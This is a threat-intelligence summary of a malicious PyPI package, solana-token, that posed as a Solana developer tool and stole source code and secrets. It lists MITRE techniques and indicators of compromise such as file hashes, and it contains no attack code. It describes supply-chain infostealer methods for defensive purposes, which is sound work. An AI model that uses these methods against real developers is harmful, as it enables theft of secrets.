The article highlights the continued rise of software supply chain attacks targeting cryptocurrency projects, exemplified by a malicious PyPI package named solana-token that steals developer secrets and source code. These attacks specifically threaten blockchain development environments and cryptocurrency infrastructure, particularly impacting the Solana platform and its developer ecosystem. #Solana #PyPI
Keypoints
- ReversingLabs reported 23 distinct malicious supply chain campaigns targeting cryptocurrency in 2024, with new campaigns continuing in 2025.
- The malicious PyPI package solana-token impersonated a utility for Solana blockchain developers and was downloaded over 600 times before removal.
- Solana-token contained code that exfiltrated application source code and developer secrets to a hard-coded IP address, enabling theft of crypto-related secrets.
- The package used suspicious behaviors such as communicating with IP addresses directly, using non-standard ports, and reading files to steal sensitive data.
- Solana-token reused the name of a previously removed malicious package, exploiting PyPI’s lack of name reuse restrictions after author-initiated removals.
- ReversingLabs notified PyPI administrators who removed the latest solana-token package to prevent further uploads under that name.
- Indicators of Compromise include specific versions (0.0.1 and 0.0.2) of solana-token and corresponding SHA1 hashes linked to the malicious package.
- This incident demonstrates the ongoing threat supply chain attacks pose to cryptocurrency development and underscores the need for vigilant monitoring.
MITRE Techniques
- [T1074] Data Staged – The malicious solana-token package collected and staged developer source code files before exfiltration (‘scanned the Python execution stack, then copied and exfiltrated source code…’).
- [T1041] Exfiltration Over C2 Channel – Source code and developer secrets were exfiltrated to a hard-coded IP address, bypassing name resolution to evade detection (‘Code containing URLs that reference a host by IP address…’).
- [T1213] Data from Information Repositories – The malware read files to steal sensitive secrets from developer environments (‘Code that reads from files… a common feature of “infostealer” malware’).
- [T1071] Application Layer Protocol – Outbound communications were initiated to non-standard ports to communicate with malicious servers (‘Code that initiates outbound communications to non-standard ports on external servers’).
Indicators of Compromise
- [File names] Malicious PyPI package names – solana-token versions 0.0.1 and 0.0.2 targeting Solana developers.
- [File hashes] SHA1 file hashes of malicious packages – f4e1149360174b4fcf0dcc6e61898c8180324893, 0b8697f8e81956e7c0c5383806fa69630c38ad33, e07457e36bf9aab1dc2b54acd30ec8f9e5c60c84, 9719d1e076ab67a18f231889cad4b451f539ce72 linked to solana-token.
- [IP addresses] Hard-coded IP targets – Used for exfiltrating stolen data from compromised developer environments (specific IP not disclosed).
Read more: https://www.reversinglabs.com/blog/same-name-different-hack-pypi-package-targets-solana-developers